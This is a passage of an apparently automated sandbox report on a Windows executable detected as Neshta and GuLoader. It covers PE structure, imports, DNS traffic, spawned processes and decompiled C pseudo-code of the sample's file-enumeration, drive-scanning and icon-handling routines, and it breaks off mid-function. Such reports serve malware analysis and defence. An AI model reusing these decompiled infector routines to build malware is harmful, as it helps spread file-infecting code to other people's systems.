                                                           BSS | 0xa000 | 0xa899 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                           .idata | 0x15000 | 0x864 | 0xa00 | False | 0.37421875 | data | 4.17385976895 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                           .tls | 0x16000 | 0x8 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                           .rdata | 0x17000 | 0x18 | 0x200 | False | 0.05078125 | data | 0.206920017787 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                           .reloc | 0x18000 | 0x5cc | 0x600 | False | 0.848307291667 | data | 6.44309346589 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                           .rsrc | 0x19000 | 0x1400 | 0x1400 | False | 0.1548828125 | data | 2.05936459375 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ

                                                          Resources

                                                           Name | RVA | Size | Type | Language | Country
                                                           RT_ICON | 0x19150 | 0x10a8 | data | Russian | Russia
                                                           RT_RCDATA | 0x1a1f8 | 0x10 | data | |
                                                           RT_RCDATA | 0x1a208 | 0xac | data | |
                                                           RT_GROUP_ICON | 0x1a2b4 | 0x14 | data | Russian | Russia

                                                          Imports

                                                           DLL | Import
                                                           kernel32.dll | DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, GetVersion, GetCurrentThreadId, GetThreadLocale, GetStartupInfoA, GetLocaleInfoA, GetCommandLineA, FreeLibrary, ExitProcess, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle
                                                           user32.dll | GetKeyboardType, MessageBoxA
                                                           advapi32.dll | RegQueryValueExA, RegOpenKeyExA, RegCloseKey
                                                           oleaut32.dll | SysFreeString, SysReAllocStringLen
                                                           kernel32.dll | TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
                                                           advapi32.dll | RegSetValueExA, RegOpenKeyExA, RegCloseKey
                                                           kernel32.dll | WriteFile, WinExec, SetFilePointer, SetFileAttributesA, SetEndOfFile, SetCurrentDirectoryA, ReleaseMutex, ReadFile, GetWindowsDirectoryA, GetTempPathA, GetShortPathNameA, GetModuleFileNameA, GetLogicalDriveStringsA, GetLocalTime, GetLastError, GetFileSize, GetFileAttributesA, GetDriveTypeA, GetCommandLineA, FreeLibrary, FindNextFileA, FindFirstFileA, FindClose, DeleteFileA, CreateMutexA, CreateFileA, CreateDirectoryA, CloseHandle
                                                           gdi32.dll | StretchDIBits, SetDIBits, SelectObject, GetObjectA, GetDIBits, DeleteObject, DeleteDC, CreateSolidBrush, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, BitBlt
                                                           user32.dll | ReleaseDC, GetSysColor, GetIconInfo, GetDC, FillRect, DestroyIcon, CopyImage, CharLowerBuffA
                                                           shell32.dll | ShellExecuteA, ExtractIconA

                                                          Possible Origin

                                                           Language of compilation system | Country where language is spoken
                                                           Russian | Russia

                                                          Network Behavior

                                                          Network Port Distribution

                                                          UDP Packets

                                                           Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                           Sep 26, 2021 16:53:26.899549961 CEST | 53097 | 53 | 192.168.2.4 | 8.8.8.8
                                                           Sep 26, 2021 16:53:26.918117046 CEST | 53 | 53097 | 8.8.8.8 | 192.168.2.4
                                                           Sep 26, 2021 16:53:50.560745955 CEST | 53157 | 53 | 192.168.2.4 | 8.8.8.8
                                                           Sep 26, 2021 16:53:50.577361107 CEST | 53 | 53157 | 8.8.8.8 | 192.168.2.4
                                                           Sep 26, 2021 16:53:58.080331087 CEST | 49257 | 53 | 192.168.2.4 | 8.8.8.8
                                                           Sep 26, 2021 16:53:58.093720913 CEST | 53 | 49257 | 8.8.8.8 | 192.168.2.4
                                                           Sep 26, 2021 16:54:09.598524094 CEST | 62389 | 53 | 192.168.2.4 | 8.8.8.8
                                                           Sep 26, 2021 16:54:09.632157087 CEST | 53 | 62389 | 8.8.8.8 | 192.168.2.4
                                                           Sep 26, 2021 16:54:18.438185930 CEST | 49910 | 53 | 192.168.2.4 | 8.8.8.8
                                                           Sep 26, 2021 16:54:18.457828045 CEST | 53 | 49910 | 8.8.8.8 | 192.168.2.4
                                                           Sep 26, 2021 16:54:50.401195049 CEST | 55854 | 53 | 192.168.2.4 | 8.8.8.8
                                                           Sep 26, 2021 16:54:50.414465904 CEST | 53 | 55854 | 8.8.8.8 | 192.168.2.4
                                                           Sep 26, 2021 16:54:57.578154087 CEST | 64549 | 53 | 192.168.2.4 | 8.8.8.8
                                                           Sep 26, 2021 16:54:57.595695019 CEST | 53 | 64549 | 8.8.8.8 | 192.168.2.4
                                                           Sep 26, 2021 16:55:07.227267981 CEST | 63153 | 53 | 192.168.2.4 | 8.8.8.8
                                                           Sep 26, 2021 16:55:07.247842073 CEST | 53 | 63153 | 8.8.8.8 | 192.168.2.4
                                                           Sep 26, 2021 16:55:50.137828112 CEST | 52991 | 53 | 192.168.2.4 | 8.8.8.8
                                                           Sep 26, 2021 16:55:50.151462078 CEST | 53 | 52991 | 8.8.8.8 | 192.168.2.4
                                                           Sep 26, 2021 16:55:51.290071011 CEST | 53700 | 53 | 192.168.2.4 | 8.8.8.8
                                                           Sep 26, 2021 16:55:51.303760052 CEST | 53 | 53700 | 8.8.8.8 | 192.168.2.4

                                                          DNS Answers

                                                           Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                                                           Sep 26, 2021 16:53:50.577361107 CEST | 8.8.8.8 | 192.168.2.4 | 0x52b2 | No error (0) | a-0019.a.dns.azurefd.net | a-0019.standard.a-msedge.net | | CNAME (Canonical name) | IN (0x0001)

                                                          Code Manipulations

                                                          Statistics

                                                          CPU Usage


                                                          Memory Usage


                                                          High Level Behavior Distribution


                                                          Behavior


                                                          System Behavior

                                                          General

Start time: 16:53:31
Start date: 26/09/2021
Path: C:\Users\user\Desktop\Z68mMCAxFZ.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\Desktop\Z68mMCAxFZ.exe'
Imagebase: 0x400000
File size: 115200 bytes
MD5 hash: 547612A9FF746063A74C71B009230500
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: 00000000.00000002.939682295.0000000000409000.00000004.00020000.sdmp, Author: Joe Security
Reputation: low

                                                          General

Start time: 16:53:33
Start date: 26/09/2021
Path: C:\Users\user\AppData\Local\Temp\3582-490\Z68mMCAxFZ.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\AppData\Local\Temp\3582-490\Z68mMCAxFZ.exe'
Imagebase: 0x400000
File size: 73728 bytes
MD5 hash: 6CE7CC1F376F6BD9D090EAF04EF72DFE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: Visual Basic
Reputation: low

                                                          General

Start time: 16:55:34
Start date: 26/09/2021
Path: C:\Users\user\AppData\Local\Temp\3582-490\Z68mMCAxFZ.exe
Wow64 process (32bit):
Commandline: 'C:\Users\user\AppData\Local\Temp\3582-490\Z68mMCAxFZ.exe'
Imagebase:
File size: 73728 bytes
MD5 hash: 6CE7CC1F376F6BD9D090EAF04EF72DFE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000000F.00000002.938917460.0000000000560000.00000040.00000001.sdmp, Author: Joe Security
Reputation: low

                                                          Disassembly

                                                          Code Analysis


                                                            Executed Functions

                                                            C-Code - Quality: 60%
                                                            			E00405634(void* __eax, intOrPtr __ecx, void* __edx, void* __esi, void* __eflags, intOrPtr _a4) {
                                                            				char _v292;
                                                            				char _v336;
                                                            				void* __ebx;
                                                            				void* __edi;
                                                            				void* __ebp;
                                                            				CHAR* _t38;
                                                            				void* _t39;
                                                            				int _t45;
                                                            				intOrPtr _t56;
                                                            				intOrPtr _t57;
                                                            				void* _t58;
                                                            				void* _t60;
                                                            				void* _t63;
                                                            				void* _t69;
                                                            				void* _t70;
                                                            				void* _t80;
                                                            				void* _t82;
                                                            				void* _t83;
                                                            				void* _t84;
                                                            				void* _t85;
                                                            				void* _t86;
                                                            				struct _WIN32_FIND_DATAA* _t87;
                                                            
                                                            				_t85 = __esi;
                                                            				_t70 = __edx;
                                                            				_t61 = __ecx;
                                                            				_t60 = __eax;
                                                            				asm("pushad");
                                                            				E004052D8(__eax);
                                                            				 *((intOrPtr*)(_t60 + 0x18)) = E0040456C();
                                                            				asm("popad");
                                                            				asm("pushad");
                                                            				_t2 = _t60 + 0x1c; // 0x1c
                                                            				E004030E8(_t2, _t70);
                                                            				asm("popad");
                                                            				if( *((intOrPtr*)(_t60 + 0x1c)) != 0) {
                                                            					asm("pushad");
                                                            					_t4 = _t60 + 0x1c; // 0x1c
                                                            					E00404DB8( *_t4, _t4);
                                                            					_t32 =  *((intOrPtr*)(_t60 + 0x20));
                                                            					if( *((intOrPtr*)(_t60 + 0x20)) == 0) {
                                                            						_t56 = E00405C80();
                                                            						 *((intOrPtr*)(_t60 + 0x20)) = _t56;
                                                            						asm("popad");
                                                            						asm("pushad");
                                                            						_t57 = _t61;
                                                            						_t61 = _t56;
                                                            						_t58 = E004048D8(_t57, _t56, 0x40569b);
                                                            						_t82 = _t61;
                                                            						if(_t58 == 0) {
                                                            							_t82 = E004056A7;
                                                            						}
                                                            						_t32 = E00405CAC( *((intOrPtr*)(_t60 + 0x20)), _t82);
                                                            					}
                                                            					asm("popad");
                                                            					_t87 = _t86 + 0xfffffec0;
                                                            					_push(0);
                                                            					_push(0);
                                                            					E00405300(_t61, _t60, _t32, _t87, _t83, _t85);
                                                            					_pop(_t63);
                                                            					E00403258( &_v336, _t63,  *((intOrPtr*)(_t60 + 0x1c)));
                                                            					E004044A8();
                                                            					_t38 = _t63;
                                                            					_push(_t38);
                                                            					_t39 = FindFirstFileA(_t38, _t87); // executed
                                                            					_t84 = _t39;
                                                            					asm("pushfd");
                                                            					E00403094(_t87);
                                                            					asm("popfd");
                                                            					if(_t39 + 1 != 0) {
                                                            						do {
                                                            							if(E0040536C(_t60, _t60, _v336,  &_v292, _t84, _t85, _a4) != 0) {
                                                            								asm("jecxz 0x16");
                                                            								 *((intOrPtr*)(_t60 + 0x24))(_t87, 1);
                                                            								asm("jecxz 0x22");
                                                            								asm("loop 0x31");
                                                            								_push(E00402448(0x140));
                                                            								E004045E8( *((intOrPtr*)(_t60 + 0x18)), _t50);
                                                            								_pop(_t80);
                                                            								_t69 = 0x140;
                                                            								E0040254C(_t87, _t69, _t80);
                                                            							}
                                                            							_t45 = FindNextFileA(_t84, _t87); // executed
                                                            						} while (_t45 != 0);
                                                            						FindClose(_t84);
                                                            					}
                                                            				}
                                                            				 *((intOrPtr*)(_t60 + 0x20)) = 0;
                                                            				return E00404520( *((intOrPtr*)(_t60 + 0x20)));
                                                            			}


                                                            APIs
                                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,00000000,00408220,00000000,00000000,004052D1,00000000,?,00000000,00000001,00000000,004074FA,00000000,0040758B), ref: 004056D5
                                                            • FindNextFileA.KERNEL32(00000000,?,00408220,?,00000000,00000000,00408220,00000000,00000000,004052D1,00000000,?,00000000,00000001,00000000,004074FA), ref: 00405737
                                                            • FindClose.KERNEL32(00000000,00000000,?,00408220,?,00000000,00000000,00408220,00000000,00000000,004052D1,00000000,?,00000000,00000001,00000000), ref: 00405741
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.939658662.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.939639704.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.939682295.0000000000409000.00000004.00020000.sdmp
• Associated: 00000000.00000002.939709688.0000000000418000.00000002.00020000.sdmp
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Find$File$CloseFirstNext
                                                            • String ID: *.*
                                                            • API String ID: 3541575487-438819550
                                                            • Opcode ID: 7c3ae3db1d7091c66810d0afebbe5bbb80646222bcf65a163e226210ed7e34e0
                                                            • Instruction ID: e0bf5d45d2763b4aada85c2368977cee553341535aa4efecd7ed3e039fa03a50
                                                            • Opcode Fuzzy Hash: 7c3ae3db1d7091c66810d0afebbe5bbb80646222bcf65a163e226210ed7e34e0
                                                            • Instruction Fuzzy Hash: 513188B53005006BD705BF26998295B3799DFC5328B60847FB904EB2C7EA7DDC018E99
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 71%
                                                            			E00405080(char __eax, void* __ebx, intOrPtr* __ecx, char __edx, void* __esi) {
                                                            				char _v8;
                                                            				char _v12;
                                                            				char _v16;
                                                            				struct _WIN32_FIND_DATAA _v336;
                                                            				char _v340;
                                                            				char _v344;
                                                            				signed int _t50;
                                                            				signed int _t51;
                                                            				int _t53;
                                                            				intOrPtr* _t76;
                                                            				intOrPtr _t85;
                                                            				void* _t96;
                                                            				void* _t99;
                                                            
                                                            				_v344 = 0;
                                                            				_v340 = 0;
                                                            				_v16 = 0;
                                                            				_t76 = __ecx;
                                                            				_v12 = __edx;
                                                            				_v8 = __eax;
                                                            				E004033FC(_v8);
                                                            				E004033FC(_v12);
                                                            				_push(_t99);
                                                            				_push(0x4051db);
                                                            				_push( *[fs:eax]);
                                                            				 *[fs:eax] = _t99 + 0xfffffeac;
                                                            				E00403094(__ecx);
                                                            				if(_v8 != 0 &&  *((char*)(_v8 + E0040320C(_v8) - 1)) != 0x5c) {
                                                            					E00403214( &_v8, 0x4051f0);
                                                            				}
                                                            				if(_v12 != 0 &&  *_v12 == 0x5c) {
                                                            					E00404728(_v12,  &_v340, 2);
                                                            					E0040312C( &_v12, _v340);
                                                            				}
                                                            				E00403258( &_v16, _v12, _v8);
                                                            				_t50 = FindFirstFileA(E0040340C(_v16),  &_v336); // executed
                                                            				_t96 = _t50;
                                                            				_t51 = _t50 & 0xffffff00 | _t96 != 0x00000000;
                                                            				while(_t51 != 0) {
                                                            					if((_v336.dwFileAttributes & 0x00000010) <= 0) {
                                                            						if( *_t76 != 0) {
                                                            							E00403214(_t76, E004051FC);
                                                            						}
                                                            						_push( *_t76);
                                                            						_push(_v8);
                                                            						E004031F4( &_v344, 0x104,  &(_v336.cFileName));
                                                            						_push(_v344);
                                                            						E004032CC();
                                                            					}
                                                            					_t53 = FindNextFileA(_t96,  &_v336); // executed
                                                            					asm("sbb eax, eax");
                                                            					_t51 = _t53 + 1;
                                                            				}
                                                            				FindClose(_t96); // executed
                                                            				_pop(_t85);
                                                            				 *[fs:eax] = _t85;
                                                            				_push(E004051E2);
                                                            				E004030B8( &_v344, 2);
                                                            				return E004030B8( &_v16, 3);
                                                            			}

                                                            APIs
                                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,004051DB,?,?,?,?,0040523E,00000000,00405291,?,?,00000000,00000000,00000000), ref: 0040513B
                                                            • FindNextFileA.KERNEL32(00000000,00000010), ref: 0040519B
                                                            • FindClose.KERNEL32(00000000,00000000,00000010), ref: 004051AB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.939658662.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.939639704.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.939682295.0000000000409000.00000004.00020000.sdmp
• Associated: 00000000.00000002.939709688.0000000000418000.00000002.00020000.sdmp
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Find$File$CloseFirstNext
                                                            • String ID:
                                                            • API String ID: 3541575487-0
                                                            • Opcode ID: 524fcd590759a1fbd4d207714f0cb58143cf8f2903c84afd41d3760fe214a385
                                                            • Instruction ID: 84585f26add88bff0cc2ce1aee7b2e7e5f9eb71f6f66f1e556af33cdfbb1cecb
                                                            • Opcode Fuzzy Hash: 524fcd590759a1fbd4d207714f0cb58143cf8f2903c84afd41d3760fe214a385
                                                            • Instruction Fuzzy Hash: ED415070900508AFDB11EF95C885BDEBBB8EF89305F5044FAE404BB291D7389F459E59
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 55%
                                                            			E004056A7(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edi, void* __esi) {
                                                            				void* _t14;
                                                            				CHAR* _t20;
                                                            				void* _t21;
                                                            				int _t30;
                                                            				void* _t41;
                                                            				void* _t45;
                                                            				void* _t51;
                                                            				void* _t60;
                                                            				void* _t62;
                                                            				void* _t65;
                                                            				void* _t67;
                                                            				struct _WIN32_FIND_DATAA* _t68;
                                                            
                                                            				_t64 = __esi;
                                                            				_t41 = __ebx;
                                                            				_t14 = __eax -  *__eax;
                                                            				asm("popad");
                                                            				_t68 = _t67 + 0xfffffec0;
                                                            				_push(0);
                                                            				_push(0);
                                                            				E00405300(__ecx, __ebx, _t14, _t68, __edi, __esi);
                                                            				_pop(_t45);
                                                            				E00403258( &(_t68->ftCreationTime), _t45,  *((intOrPtr*)(__ebx + 0x1c)));
                                                            				E004044A8();
                                                            				_t20 = _t45;
                                                            				_push(_t20);
                                                            				_t21 = FindFirstFileA(_t20, _t68); // executed
                                                            				_t62 = _t21;
                                                            				asm("pushfd");
                                                            				E00403094(_t68);
                                                            				asm("popfd");
                                                            				if(_t21 + 1 != 0) {
                                                            					do {
                                                            						if(E0040536C(_t41, _t41, _t68->dwFileAttributes,  &(_t68->cFileName[4]), _t62, _t64,  *((intOrPtr*)(_t65 + 8))) != 0) {
                                                            							asm("jecxz 0x16");
                                                            							 *((intOrPtr*)(_t41 + 0x24))(_t68, 1);
                                                            							asm("jecxz 0x22");
                                                            							asm("loop 0x31");
                                                            							_push(E00402448(0x140));
                                                            							E004045E8( *((intOrPtr*)(_t41 + 0x18)), _t35);
                                                            							_pop(_t60);
                                                            							_t51 = 0x140;
                                                            							E0040254C(_t68, _t51, _t60);
                                                            						}
                                                            						_t30 = FindNextFileA(_t62, _t68); // executed
                                                            					} while (_t30 != 0);
                                                            					FindClose(_t62);
                                                            				}
                                                            				 *((intOrPtr*)(_t41 + 0x20)) = 0;
                                                            				return E00404520( *((intOrPtr*)(_t41 + 0x20)));
                                                            			}

                                                            APIs
                                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,00000000,00408220,00000000,00000000,004052D1,00000000,?,00000000,00000001,00000000,004074FA,00000000,0040758B), ref: 004056D5
                                                            • FindNextFileA.KERNEL32(00000000,?,00408220,?,00000000,00000000,00408220,00000000,00000000,004052D1,00000000,?,00000000,00000001,00000000,004074FA), ref: 00405737
                                                            • FindClose.KERNEL32(00000000,00000000,?,00408220,?,00000000,00000000,00408220,00000000,00000000,004052D1,00000000,?,00000000,00000001,00000000), ref: 00405741
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.939658662.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.939639704.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000000.00000002.939682295.0000000000409000.00000004.00020000.sdmp
                                                            • Associated: 00000000.00000002.939709688.0000000000418000.00000002.00020000.sdmp
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Find$File$CloseFirstNext
                                                            • String ID:
                                                            • API String ID: 3541575487-0
                                                            • Opcode ID: 7e704a9b868fdf1e88b7c0ef0153828458dabf46e2b7cce886aa46cd4968a9f2
                                                            • Instruction ID: f2b03bfa0ad8d059d80b67f6c6517dce38b4ab09ecbfd790616c6b691a452e24
                                                            • Opcode Fuzzy Hash: 7e704a9b868fdf1e88b7c0ef0153828458dabf46e2b7cce886aa46cd4968a9f2
                                                            • Instruction Fuzzy Hash: 0E1181B53005006BD605BB269D8296B3759DBC5328B10843FBA04EB2C7DA3DCC029A99
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 67%
                                                            			E00406D40(void* __eax, void* __ebx, void* __edi, void* __esi, char _a12245929) {
                                                            				char _v155;
                                                            				char _v160;
                                                            				signed int _t37;
                                                            				intOrPtr _t41;
                                                            				void* _t45;
                                                            				void* _t50;
                                                            				void* _t51;
                                                            
                                                            				_t50 = _t51;
                                                            				_v160 = 0;
                                                            				_t45 = __eax;
                                                            				_push(_t50);
                                                            				_push(0x406dfc);
                                                            				_push( *[fs:eax]);
                                                            				 *[fs:eax] = _t51 + 0xffffff64;
                                                            				GetLogicalDriveStringsA(0x97,  &_v155); // executed
                                                            				_t37 = 0;
                                                            				while(_a12245929 != 0) {
                                                            					_t48 = _t37 & 0x000000ff;
                                                            					if(GetDriveTypeA(_t50 + (_t37 & 0x000000ff) - 0x97) != 5 && E0040258C( *((intOrPtr*)(_t50 + _t48 - 0x97))) != 0x41 && E0040258C( *((intOrPtr*)(_t50 + _t48 - 0x97))) != 0x42) {
                                                            						E004031B4();
                                                            						E00403214(_t45, _v160);
                                                            					}
                                                            					_t37 = _t37 + 4;
                                                            				}
                                                            				_pop(_t41);
                                                            				 *[fs:eax] = _t41;
                                                            				_push(E00406E03);
                                                            				return E00403094( &_v160);
                                                            			}

                                                            APIs
                                                            • GetLogicalDriveStringsA.KERNEL32, ref: 00406D70
                                                            • GetDriveTypeA.KERNEL32(00000000), ref: 00406D89
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.939658662.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.939639704.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000000.00000002.939682295.0000000000409000.00000004.00020000.sdmp
                                                            • Associated: 00000000.00000002.939709688.0000000000418000.00000002.00020000.sdmp
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Drive$LogicalStringsType
                                                            • String ID:
                                                            • API String ID: 1630765265-0
                                                            • Opcode ID: e173af02ca9d9f3ac33bd7cae86aa4c8f38faec1d5ba2bccd9283cb2c0ba3d05
                                                            • Instruction ID: e1e1b0806745e30ff5eb453561950d2c3ef676df74625b4c39c06a75345551cd
                                                            • Opcode Fuzzy Hash: e173af02ca9d9f3ac33bd7cae86aa4c8f38faec1d5ba2bccd9283cb2c0ba3d05
                                                            • Instruction Fuzzy Hash: 301159725181089EE720BE759C52BAA7FADDF45304F4644F7AA0DB32C3D9384D128A28
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E00404F6C(CHAR* __eax) {
                                                            				intOrPtr _v288;
                                                            				void* _t3;
                                                            				void* _t4;
                                                            				struct _WIN32_FIND_DATAA* _t8;
                                                            
                                                            				_t3 = FindFirstFileA(__eax, _t8); // executed
                                                            				_t4 = _t3 + 1;
                                                            				if(_t4 != 0) {
                                                            					FindClose(_t4 - 1); // executed
                                                            					return _v288;
                                                            				}
                                                            				return _t4;
                                                            			}

                                                            APIs
                                                            • FindFirstFileA.KERNEL32(?,?,0040818B,00000000,00408220), ref: 00404F74
                                                            • FindClose.KERNEL32(00000000,?,?,0040818B,00000000,00408220), ref: 00404F7E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.939658662.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.939639704.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000000.00000002.939682295.0000000000409000.00000004.00020000.sdmp
                                                            • Associated: 00000000.00000002.939709688.0000000000418000.00000002.00020000.sdmp
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Find$CloseFileFirst
                                                            • String ID:
                                                            • API String ID: 2295610775-0
                                                            • Opcode ID: 66901251027beccf77baa5ce98e67b536316a538da170c98b5b2277659282e4c
                                                            • Instruction ID: 35bd28bbec0286cbaf15e580cccf41787655d5f9f594f83c1a320a5651e29ebc
                                                            • Opcode Fuzzy Hash: 66901251027beccf77baa5ce98e67b536316a538da170c98b5b2277659282e4c
                                                            • Instruction Fuzzy Hash: B8C08CE480010023C80033AA8C06A27204CBAC0358F88092A7BA8F72C3C93E891040AE
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 78%
                                                            			E00406638(void** __eax, intOrPtr __ecx, unsigned int __edx) {
                                                            				intOrPtr _v8;
                                                            				intOrPtr _v12;
                                                            				short _v14;
                                                            				char _v17;
                                                            				signed int _v18;
                                                            				char _v19;
                                                            				int _v20;
                                                            				void** _v24;
                                                            				unsigned int _v28;
                                                            				intOrPtr _v32;
                                                            				char _v33;
                                                            				int _v40;
                                                            				intOrPtr _v44;
                                                            				void* _v48;
                                                            				intOrPtr _v52;
                                                            				intOrPtr _v56;
                                                            				signed short _v58;
                                                            				short _v60;
                                                            				short _v62;
                                                            				intOrPtr _v68;
                                                            				void* _v72;
                                                            				void** _v76;
                                                            				void** _v80;
                                                            				intOrPtr _v100;
                                                            				signed short _v106;
                                                            				short _v108;
                                                            				int _v112;
                                                            				int _v116;
                                                            				char _v120;
                                                            				short _v126;
                                                            				intOrPtr _v128;
                                                            				int _v136;
                                                            				int _v140;
                                                            				void _v144;
                                                            				void* __ebp;
                                                            				signed int _t138;
                                                            				signed int _t139;
                                                            				void* _t141;
                                                            				unsigned int _t152;
                                                            				void* _t154;
                                                            				void* _t162;
                                                            				void* _t179;
                                                            				void* _t181;
                                                            				void* _t199;
                                                            				void* _t201;
                                                            				void* _t207;
                                                            				void* _t212;
                                                            				void* _t214;
                                                            				signed int _t220;
                                                            				void* _t221;
                                                            				void* _t229;
                                                            				void* _t232;
                                                            				void* _t243;
                                                            				void* _t255;
                                                            				intOrPtr _t264;
                                                            				void* _t274;
                                                            				void* _t275;
                                                            				int _t293;
                                                            				int _t294;
                                                            				intOrPtr _t318;
                                                            				void* _t324;
                                                            				void* _t366;
                                                            				void* _t369;
                                                            				int _t375;
                                                            				int _t376;
                                                            				void* _t378;
                                                            				void* _t380;
                                                            				intOrPtr _t381;
                                                            
                                                            				_t378 = _t380;
                                                            				_t381 = _t380 + 0xffffff74;
                                                            				_v32 = __ecx;
                                                            				_v28 = __edx;
                                                            				_v24 = __eax;
                                                            				_v33 = 0;
                                                            				_v62 = 0;
                                                            				_v60 = 1;
                                                            				_t138 = _v28 + 1;
                                                            				_t139 = _t138 >> 1;
                                                            				if(_t138 < 0) {
                                                            					asm("adc eax, 0x0");
                                                            				}
                                                            				_v58 = _t139;
                                                            				_t141 = E0040598C(_v32);
                                                            				_t384 = _t141 - 6;
                                                            				if(_t141 != 6) {
                                                            					L59:
                                                            					return _v33;
                                                            				} else {
                                                            					_v44 = ((_v58 & 0x0000ffff) << 4) + 6;
                                                            					_v68 = E0040456C();
                                                            					_v52 = E00405FD8(0, 0, _t384);
                                                            					_v56 = E00405FD8(0, 0, _t384);
                                                            					_push(_t378);
                                                            					_push(0x406b11);
                                                            					_push( *[fs:ecx]);
                                                            					 *[fs:ecx] = _t381;
                                                            					_t152 = _v28 >> 1;
                                                            					if(_t152 < 0) {
                                                            						L22:
                                                            						_t154 = _v28 >> 1;
                                                            						__eflags = _t154;
                                                            						if(_t154 < 0) {
                                                            							L57:
                                                            							__eflags = 0;
                                                            							_pop(_t318);
                                                            							 *[fs:eax] = _t318;
                                                            							_push(E00406B18);
                                                            							E00404520(_v68);
                                                            							E00404520(_v52);
                                                            							return E00404520(_v56);
                                                            						} else {
                                                            							_t162 = _t154 + 1;
                                                            							__eflags = _t162;
                                                            							_v72 = _t162;
                                                            							_v40 = 0;
                                                            							_v80 = _v24;
                                                            							do {
                                                            								_t366 =  *_v80;
                                                            								_v48 = _v80[1];
                                                            								__eflags = _t366;
                                                            								if(_t366 != 0) {
                                                            									L26:
                                                            									GetObjectA(_v48, 0x18,  &_v144);
                                                            									_t293 = _v140;
                                                            									_t375 = _v136;
                                                            									E00402660( &_v120, 0x28);
                                                            									_v120 = 0x28;
                                                            									_v116 = _t293;
                                                            									_v112 = _t375;
                                                            									__eflags = _t366;
                                                            									if(_t366 != 0) {
                                                            										_t243 = _t293 + _t293;
                                                            										__eflags = _t243;
                                                            										_v112 = _t243;
                                                            									}
                                                            									_v108 = 1;
                                                            									_v18 = E0040465C(_v68, _v40);
                                                            									__eflags = _v14;
                                                            									if(_v14 == 0) {
                                                            										_v14 = E00406580(_v18 & 0x0000ffff);
                                                            									}
                                                            									_v106 = _v14;
                                                            									_push(E004065CC(_t293, _t375, _t378) + 0x28);
                                                            									_t179 = E00406624(_t293, _t375);
                                                            									_pop(_t324);
                                                            									_v100 = _t324 + _t179;
                                                            									_t181 = E0040598C(_v32);
                                                            									__eflags = _t181 - 0x28;
                                                            									if(_t181 == 0x28) {
                                                            										__eflags = _t366;
                                                            										if(__eflags == 0) {
                                                            											E004061E0(_v52, CopyImage(_v48, 0, _t293, _t375, 0), __eflags);
                                                            											E00406218(_v52, 0x28, 1, _t378, __eflags);
                                                            										} else {
                                                            											E004061E0(_v52, CopyImage(_t366, 0, _t293, _t375, 0), __eflags);
                                                            											_t220 = _v106 & 0x0000ffff;
                                                            											__eflags = _t220 - 0x10;
                                                            											if(__eflags > 0) {
                                                            												_t221 = _t220 - 0x18;
                                                            												__eflags = _t221;
                                                            												if(__eflags == 0) {
                                                            													E00406218(_v52, 0x28, 6, _t378, __eflags);
                                                            												} else {
                                                            													__eflags = _t221 - 8;
                                                            													if(__eflags == 0) {
                                                            														E00406218(_v52, 0x28, 7, _t378, __eflags);
                                                            													}
                                                            												}
                                                            											} else {
                                                            												if(__eflags == 0) {
